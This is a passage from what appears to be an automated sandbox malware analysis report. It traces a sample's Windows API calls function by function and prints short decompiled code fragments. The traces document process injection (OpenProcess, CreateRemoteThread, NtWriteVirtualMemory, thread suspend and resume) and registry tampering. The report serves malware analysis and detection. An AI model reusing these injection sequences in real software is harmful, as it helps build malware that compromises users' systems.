                      • memset.NTDLL ref: 01412282
                        • Part of subcall function 01413223: OpenProcess.KERNEL32(00000400,00000000,01417614,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141323E
                        • Part of subcall function 01413223: IsWow64Process.KERNELBASE(01417624,?,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141324F
                        • Part of subcall function 01413223: CloseHandle.KERNEL32(01417624), ref: 01413262
                        • Part of subcall function 01413CB2: NtReadVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C), ref: 01413CD0
                        • Part of subcall function 01413CB2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413CDF
                        • Part of subcall function 01413CB2: SetLastError.KERNEL32(00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 01413CE6
                      • ResumeThread.KERNELBASE(?), ref: 014123A5
                        • Part of subcall function 0141199F: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000,0141244E), ref: 014119BC
                        • Part of subcall function 0141199F: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E), ref: 014119F0
                      • ResumeThread.KERNELBASE(?,00000000,0141244E,CCCCFEEB,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141230D
                      • WaitForSingleObject.KERNEL32(00000064), ref: 0141231B
                      • SuspendThread.KERNELBASE(?), ref: 0141232E
                        • Part of subcall function 01413C91: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413CA9
                        • Part of subcall function 01412102: memset.NTDLL ref: 01412130
                        • Part of subcall function 01412102: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 014121BA
                        • Part of subcall function 01412102: WaitForSingleObject.KERNEL32(00000064), ref: 014121C8
                        • Part of subcall function 01412102: SuspendThread.KERNEL32(?), ref: 014121DB
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411D5F
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411DB0
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,01412486,00000800,?,?,?,00000000), ref: 01411E20
                        • Part of subcall function 01411C29: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01411E4B
                        • Part of subcall function 01411C29: RtlNtStatusToDosError.NTDLL(00000000), ref: 01411E52
                        • Part of subcall function 01411C29: CloseHandle.KERNEL32(00000000), ref: 01411E61
                        • Part of subcall function 01411C29: memset.NTDLL ref: 01411E75
                      • GetLastError.KERNEL32(00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141239A
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: ErrorThread$ResumeStatusVirtualmemcpymemset$CloseHandleLastObjectProcessProtectSingleSuspendWait$MemoryOpenReadSectionUnmapViewWow64
                      • String ID:
                      • API String ID: 1182286539-0
                      • Opcode ID: 5fd7ffdd7abc41383f3abd0d3651c02ab562437bce824dd9e27707973112b622
                      • Instruction ID: aabfffdcbe371b315c85228dd6327157fd71e93933947d6cd7ccae43e36fa16b
                      • Opcode Fuzzy Hash: 5fd7ffdd7abc41383f3abd0d3651c02ab562437bce824dd9e27707973112b622
                      • Instruction Fuzzy Hash: 4931FF72800129BBDF21AF69CC44EDEBB79FF04360F118566EA18E6264D7B0DA41CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 014123B4, Relevance: 9.1, APIs: 6, Instructions: 78threadinjectionCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 01413223: OpenProcess.KERNEL32(00000400,00000000,01417614,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141323E
                        • Part of subcall function 01413223: IsWow64Process.KERNELBASE(01417624,?,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141324F
                        • Part of subcall function 01413223: CloseHandle.KERNEL32(01417624), ref: 01413262
                      • OpenProcess.KERNEL32(001F0FFF,00000000,0141155F,0141155F,C000009A,01417614,00000000,?,?,0141155F,?,00000000,?,01417614), ref: 014123DF
                      • CreateRemoteThread.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,0141155F,?,00000000,?,01417614), ref: 01412439
                      • GetLastError.KERNEL32(?,?,0141155F,?,00000000,?,01417614), ref: 0141245B
                        • Part of subcall function 0141225F: memset.NTDLL ref: 01412282
                        • Part of subcall function 0141225F: ResumeThread.KERNELBASE(?,00000000,0141244E,CCCCFEEB,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141230D
                        • Part of subcall function 0141225F: WaitForSingleObject.KERNEL32(00000064), ref: 0141231B
                        • Part of subcall function 0141225F: SuspendThread.KERNELBASE(?), ref: 0141232E
                        • Part of subcall function 0141225F: GetLastError.KERNEL32(00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 0141239A
                        • Part of subcall function 0141225F: ResumeThread.KERNELBASE(?), ref: 014123A5
                      • CloseHandle.KERNEL32(0141155F), ref: 01412453
                      • CloseHandle.KERNEL32(?), ref: 0141246D
                      • GetLastError.KERNEL32(?,?,0141155F,?,00000000,?,01417614), ref: 01412475
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Thread$CloseErrorHandleLastProcess$OpenResume$CreateObjectRemoteSingleSuspendWaitWow64memset
                      • String ID:
                      • API String ID: 1305399161-0
                      • Opcode ID: f5875bc7edfb608e604b81ebb6ba83a380246854cebbd40151e47695b0432c30
                      • Instruction ID: 65411e031ce57f4a6e16dfa4ed0ae6e7522ef67508750cb921054349baaae94a
                      • Opcode Fuzzy Hash: f5875bc7edfb608e604b81ebb6ba83a380246854cebbd40151e47695b0432c30
                      • Instruction Fuzzy Hash: CA219672D40129BFDB219FF9DC48DAFBF75EB08254B114936EA15E2238D7B18D058B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01414253, Relevance: 6.1, APIs: 4, Instructions: 99registrysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,00000001,00000000,000000B7,00000001,?,00000000,?,?,01417614), ref: 0141427A
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • RegEnumKeyExA.KERNEL32(00000000,?,00000000,01417614,00000000,00000000,00000000,00000000,00000104,00000000,?,01417614), ref: 014142C1
                      • WaitForSingleObject.KERNEL32(00000000,?), ref: 0141432E
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                        • Part of subcall function 01412EC0: StrChrA.SHLWAPI(01414321,0000005F), ref: 01412F03
                        • Part of subcall function 01412EC0: lstrcpy.KERNEL32(?,01414321), ref: 01412F1B
                        • Part of subcall function 01412EC0: RegOpenKeyA.ADVAPI32(?,?,?), ref: 01412F51
                        • Part of subcall function 01412EC0: RegQueryValueExW.KERNEL32(?,014181C0,00000000,?,00000000,01414321), ref: 01412F77
                        • Part of subcall function 01412EC0: lstrlenW.KERNEL32 ref: 01412F88
                        • Part of subcall function 01412EC0: RtlAllocateHeap.NTDLL(00000000,01414357), ref: 01412F9D
                        • Part of subcall function 01412EC0: RegQueryValueExW.KERNEL32(?,014181C0,00000000,?,00000000,01414321), ref: 01412FC2
                        • Part of subcall function 01412EC0: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01412FE8
                        • Part of subcall function 01412EC0: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01412FFA
                        • Part of subcall function 01412EC0: lstrcmpiW.KERNEL32(00000000), ref: 01413011
                        • Part of subcall function 01412EC0: lstrcpy.KERNEL32(?,014180FA), ref: 01413053
                        • Part of subcall function 01412EC0: lstrcpy.KERNEL32(?,?), ref: 014130AC
                        • Part of subcall function 01412EC0: RegCreateKeyA.ADVAPI32(?,?,?), ref: 014130C0
                        • Part of subcall function 01412EC0: RegQueryValueExA.KERNEL32(?,01418256,00000000,?,?,01414321), ref: 014130E3
                        • Part of subcall function 01412EC0: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 01413146
                        • Part of subcall function 01412EC0: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01413161
                        • Part of subcall function 01412EC0: RegDeleteValueW.ADVAPI32(?,014176D0), ref: 0141316F
                        • Part of subcall function 01412EC0: RegCloseKey.ADVAPI32(?), ref: 01413178
                        • Part of subcall function 01412EC0: RegCloseKey.ADVAPI32(?), ref: 01413181
                        • Part of subcall function 01412EC0: HeapFree.KERNEL32(00000000,01414321,?), ref: 01413196
                        • Part of subcall function 01412EC0: HeapFree.KERNEL32(00000000,00000000), ref: 014131B9
                        • Part of subcall function 01412EC0: RegCloseKey.ADVAPI32(?), ref: 014131CB
                      • RegCloseKey.ADVAPI32(?,00000104,00000000,?,01417614), ref: 01414356
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Heap$CloseOpenValue$CreateFreeQuerylstrcpy$AllocateDirectory$DeleteEnumObjectSingleWaitlstrcmpilstrlen
                      • String ID:
                      • API String ID: 3883769817-0
                      • Opcode ID: 13782e24ac49036d91750406ee89a51d2c86c3ca526de11de78e8c9342735dbe
                      • Instruction ID: b019c1c543a7228cdedd504c8225294246f5fa611400b32c9f7f8eabef588b17
                      • Opcode Fuzzy Hash: 13782e24ac49036d91750406ee89a51d2c86c3ca526de11de78e8c9342735dbe
                      • Instruction Fuzzy Hash: 66314C75E00119ABCF22AFA9CC448EFFFB9EB58750F15452AE515B3268D3704A91CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413271, Relevance: 6.1, APIs: 4, Instructions: 71fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 01413B94: GetModuleFileNameW.KERNEL32(01417614,00000000,00000104,00000208,0141618C,0000000C,?,?,01412A29,?,00000001,0141618C,0000000C,00000000), ref: 01413BBA
                        • Part of subcall function 01413B94: GetModuleFileNameA.KERNEL32(01417614,00000000,00000104,00000208,0141618C,0000000C,?,?,01412A29,?,00000001,0141618C,0000000C,00000000), ref: 01413BC2
                        • Part of subcall function 01413B94: GetLastError.KERNEL32(?,?,01412A29,?,00000001,0141618C,0000000C,00000000,?,?,?,01411746), ref: 01413C00
                        • Part of subcall function 014147D2: lstrcmp.KERNEL32(?,01417614), ref: 01414882
                        • Part of subcall function 014147D2: lstrlen.KERNEL32(?,00000000,00000000,014117CE), ref: 0141488D
                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 014132C4
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01411B26,01418451), ref: 014132D6
                      • ReadFile.KERNELBASE(?,?,00000004,?,00000000), ref: 014132EE
                      • CloseHandle.KERNEL32(?), ref: 01413309
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$ModuleName$CloseCreateErrorFreeHandleHeapLastPointerReadlstrcmplstrlen
                      • String ID:
                      • API String ID: 846255529-0
                      • Opcode ID: 2dfebe20150aac1fcf0bc552c3a3b58a5bc2bf42db84b4dae2248feed20abfd6
                      • Instruction ID: c72eb72652e0b4f430f31c0f305d274d8c9bcbf0c5d705bb7231b64d1feb20d7
                      • Opcode Fuzzy Hash: 2dfebe20150aac1fcf0bc552c3a3b58a5bc2bf42db84b4dae2248feed20abfd6
                      • Instruction Fuzzy Hash: F3118171A01118BBDB219F6ACD48EEFBE6DEF51670F104026F605E1279D7708A10C7A4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16memorythreadCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401649(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






                      0x00401012
                      0x00401014
                      0x0040101c
                      0x00401026
                      0x0040101e
                      0x0040101f
                      0x0040101f
                      0x0040102d

                      APIs
                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
                      • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
                      • GetLastError.KERNEL32 ref: 00401026
                      • ExitThread.KERNEL32 ref: 0040102D
                        • Part of subcall function 00401649: CreateThread.KERNELBASE(00000000,00000000,00401034,?,00000000,?), ref: 0040167E
                        • Part of subcall function 00401649: CreateThread.KERNELBASE(00000000,00000000,004010FB,?,00000000,?), ref: 0040169C
                        • Part of subcall function 00401649: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016B3
                        • Part of subcall function 00401649: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016C0
                        • Part of subcall function 00401649: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016D0
                        • Part of subcall function 00401649: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016D9
                        • Part of subcall function 00401649: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016F7
                        • Part of subcall function 00401649: CloseHandle.KERNEL32(?), ref: 00401700
                        • Part of subcall function 00401649: GetLastError.KERNEL32(?,?,00000000), ref: 00401708
                        • Part of subcall function 00401649: CloseHandle.KERNEL32(?), ref: 00401714
                        • Part of subcall function 00401649: GetLastError.KERNEL32(?,00000000), ref: 0040171D
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: Thread$CreateErrorExitHandleLast$CloseCodeObjectSingleWait$HeapModuleTerminate
                      • String ID:
                      • API String ID: 1018212157-0
                      • Opcode ID: 2d07d5a0eb97ff0e7f2ca181030923815197595ddaad25644c682c495b87b4cd
                      • Instruction ID: d49e082437a9ef023ccd0a11086753c1fee01878f1312c092d0fc4a9b36bd46a
                      • Opcode Fuzzy Hash: 2d07d5a0eb97ff0e7f2ca181030923815197595ddaad25644c682c495b87b4cd
                      • Instruction Fuzzy Hash: E2D0C735640310A7F6212BB15F4DB4B3918AF04789F144531F745F50E0CAF94440C66D
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00381F6C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137memoryCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148913877.00380000.00000040.sdmp, Offset: 00380000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_380000_text.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: x
                      • API String ID: 544645111-2363233923
                      • Opcode ID: b045e46c02a179eb745e3c3d3a12724a959805edea901451e028913547b6c025
                      • Instruction ID: aaeb3b41bccad396f4c5fb79abdf55d3d264e0308aeb663e7c3ad225a4184838
                      • Opcode Fuzzy Hash: b045e46c02a179eb745e3c3d3a12724a959805edea901451e028913547b6c025
                      • Instruction Fuzzy Hash: B461ABB4D047189FCB14DF99C880A9DFBF1BF88300F21895AE958AB355D774A985CF81
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 014114BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                      Download Yara Rule
                      APIs
                      • RtlUpcaseUnicodeString.NTDLL(?,0141764C,00000001), ref: 014114E6
                        • Part of subcall function 0141139A: memset.NTDLL ref: 014113BA
                        • Part of subcall function 0141139A: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 014113F9
                        • Part of subcall function 0141139A: GetLastError.KERNEL32 ref: 01411429
                        • Part of subcall function 0141139A: HeapFree.KERNEL32(00000000,?), ref: 0141143B
                        • Part of subcall function 014123B4: OpenProcess.KERNEL32(001F0FFF,00000000,0141155F,0141155F,C000009A,01417614,00000000,?,?,0141155F,?,00000000,?,01417614), ref: 014123DF
                        • Part of subcall function 014123B4: CreateRemoteThread.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,0141155F,?,00000000,?,01417614), ref: 01412439
                        • Part of subcall function 014123B4: CloseHandle.KERNEL32(0141155F), ref: 01412453
                        • Part of subcall function 014123B4: GetLastError.KERNEL32(?,?,0141155F,?,00000000,?,01417614), ref: 0141245B
                        • Part of subcall function 014123B4: CloseHandle.KERNEL32(?), ref: 0141246D
                        • Part of subcall function 014123B4: GetLastError.KERNEL32(?,?,0141155F,?,00000000,?,01417614), ref: 01412475
                      • RtlFreeAnsiString.NTDLL(?), ref: 01411564
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: ErrorLast$CloseCreateFreeHandleProcessString$AnsiHeapOpenRemoteThreadUnicodeUpcasememset
                      • String ID: pnls
                      • API String ID: 4173972397-141991303
                      • Opcode ID: b9ee881b4deb202c320435dcc4766fe245898743c79f9b115f5a301203b21884
                      • Instruction ID: 534cf80f2f25f82b1f9015735faf771b90f25f168f7c15e81ec5511e1fdd104c
                      • Opcode Fuzzy Hash: b9ee881b4deb202c320435dcc4766fe245898743c79f9b115f5a301203b21884
                      • Instruction Fuzzy Hash: AB11E7306102059BDB20DF3DD8449AB7BA9EF04A50F18851BEB53C367CE771E944C741
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401495, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 82%
                      			E00401495(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}















                      0x0040149f
                      0x004014a4
                      0x004014b0
                      0x004014bd
                      0x004014c3
                      0x004014c5
                      0x004014cb
                      0x00401538
                      0x0040153f
                      0x0040153f
                      0x004014cd
                      0x004014d0
                      0x004014d0
                      0x004014d4
                      0x00000000
                      0x00000000
                      0x004014d6
                      0x004014da
                      0x004014f2
                      0x004014f6
                      0x0040150a
                      0x004014f8
                      0x004014f8
                      0x004014fe
                      0x00401502
                      0x00401502
                      0x004014dc
                      0x004014dc
                      0x004014e8
                      0x004014ed
                      0x004014ed
                      0x0040151b
                      0x0040151f
                      0x00401527
                      0x00401527
                      0x0040152a
                      0x0040152d
                      0x00401530
                      0x00401536
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00401536
                      0x00000000

                      APIs
                      • VirtualProtect.KERNELBASE(00000000,?,00000004,00000000,00000000,?,?,004015FF,00000000), ref: 004014C3
                      • VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 0040151B
                      • GetLastError.KERNEL32 ref: 00401521
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: ProtectVirtual$ErrorLast
                      • String ID:
                      • API String ID: 1469625949-0
                      • Opcode ID: 95d2213623497587fae5e7dbb29a83bab2f11f1efb818d08303951515af05ee9
                      • Instruction ID: 09eb7866679b6c449c64175da2a2ea58a88de491138e230cfb810df5d0af35aa
                      • Opcode Fuzzy Hash: 95d2213623497587fae5e7dbb29a83bab2f11f1efb818d08303951515af05ee9
                      • Instruction Fuzzy Hash: 6E21C672900209EFEB208F94CC80FBEB7B4FB50355F10446AE541AB1A1D3749A85DB54
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413223, Relevance: 4.5, APIs: 3, Instructions: 33COMMON
                      Download Yara Rule
                      APIs
                      • OpenProcess.KERNEL32(00000400,00000000,01417614,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141323E
                      • IsWow64Process.KERNELBASE(01417624,?,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141324F
                      • CloseHandle.KERNEL32(01417624), ref: 01413262
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Process$CloseHandleOpenWow64
                      • String ID:
                      • API String ID: 10462204-0
                      • Opcode ID: 2ff2ea147ee6e79f28ba4adb59f63fe5299a8e25c07d7206360c4d728937242a
                      • Instruction ID: 2065391e23837db4299b860535537d29f5d211ea97b94411c1b16cef8870f87e
                      • Opcode Fuzzy Hash: 2ff2ea147ee6e79f28ba4adb59f63fe5299a8e25c07d7206360c4d728937242a
                      • Instruction Fuzzy Hash: 56F05EB1900114FB9B21EF59C8088DFBEBCFF856A1B118126FE09A3218E2719A01D7A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003820B2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93memoryCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148913877.00380000.00000040.sdmp, Offset: 00380000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_380000_text.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: x
                      • API String ID: 544645111-2363233923
                      • Opcode ID: 13a2c97311ebe5e01ae6c14131f6a038acb3d00137f498876f111329a79ccbc0
                      • Instruction ID: 7278c62771519817fda3e430b20af58aab95186353d54bae1be77a916756204c
                      • Opcode Fuzzy Hash: 13a2c97311ebe5e01ae6c14131f6a038acb3d00137f498876f111329a79ccbc0
                      • Instruction Fuzzy Hash: 4B417AB5E002288FDB64CF68C980B89FBF1BF89314F16859AD959A7311D770AE85CF41
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01411189, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 01414161: HeapFree.KERNEL32(00000000,0141618C,0141618C), ref: 014141B7
                        • Part of subcall function 01414631: lstrlen.KERNEL32(0141618C,00000000,?,00000027,0141618C,00000000,00000000,0141822E,00000000,?,0141618C,00000000,00000000), ref: 01414667
                        • Part of subcall function 01414631: lstrcpy.KERNEL32(00000000,00000000), ref: 0141468B
                        • Part of subcall function 01414631: lstrcat.KERNEL32(00000000,00000000), ref: 01414693
                      • HeapFree.KERNEL32(00000000,?,Local\), ref: 0141121A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: FreeHeap$lstrcatlstrcpylstrlen
                      • String ID: Local\
                      • API String ID: 2271934720-422136742
                      • Opcode ID: 6e2f13c37659814026ad25b8a8a650051358d560865bce752cfe06e82363532e
                      • Instruction ID: d8e8d9c9b376cac89bc4600940396e64921e75bb8104ef77b4f32349c98e01ac
                      • Opcode Fuzzy Hash: 6e2f13c37659814026ad25b8a8a650051358d560865bce752cfe06e82363532e
                      • Instruction Fuzzy Hash: D211737590024AEBDB20DB6AED01BDE7BB8EB90741F10446B9904E6168EB34D601CB14
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01411ADD, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(014180DB,?,CCCCFEEB,01411E0D,?,?,?,00000000), ref: 01411B10
                        • Part of subcall function 01413271: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 014132C4
                        • Part of subcall function 01413271: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01411B26,01418451), ref: 014132D6
                        • Part of subcall function 01413271: ReadFile.KERNELBASE(?,?,00000004,?,00000000), ref: 014132EE
                        • Part of subcall function 01413271: CloseHandle.KERNEL32(?), ref: 01413309
                      • memcpy.NTDLL(?,014175E0,00000018,0141845C,01418400,01418451), ref: 01411B7B
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Handle$CloseCreateModulePointerReadmemcpy
                      • String ID:
                      • API String ID: 3176338324-0
                      • Opcode ID: 92f2bdce608aef5e2c45e3ee945bece5684b6be90141b169fce7d67ae3f72559
                      • Instruction ID: b13f0ce52fb272248fc08d0244d26c76686742e29c867d024f0205ee417200a8
                      • Opcode Fuzzy Hash: 92f2bdce608aef5e2c45e3ee945bece5684b6be90141b169fce7d67ae3f72559
                      • Instruction Fuzzy Hash: 23015E757916825BD730EF2AE802D467FA1B7A0A12719452BE208D263CFA30E5018BA5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0141199F, Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                      • VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000,0141244E), ref: 014119BC
                        • Part of subcall function 01413CF3: NtWriteVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,014160F0,?,014119D6,?,00000004,0141244E,00000004,?), ref: 01413D11
                        • Part of subcall function 01413CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413D20
                        • Part of subcall function 01413CF3: SetLastError.KERNEL32(00000000,?,014119D6,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000), ref: 01413D27
                      • VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E), ref: 014119F0
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Virtual$ErrorProtect$LastMemoryStatusWrite
                      • String ID:
                      • API String ID: 1675666816-0
                      • Opcode ID: 79f88a124a0b69b190a03fa5f34c235a6966a857f89ecb5216a90b1f742dbf1b
                      • Instruction ID: ecec4cd03bc2aa4ea0edf11cef80cd4a802e67899d133f1d168b13b72becba43
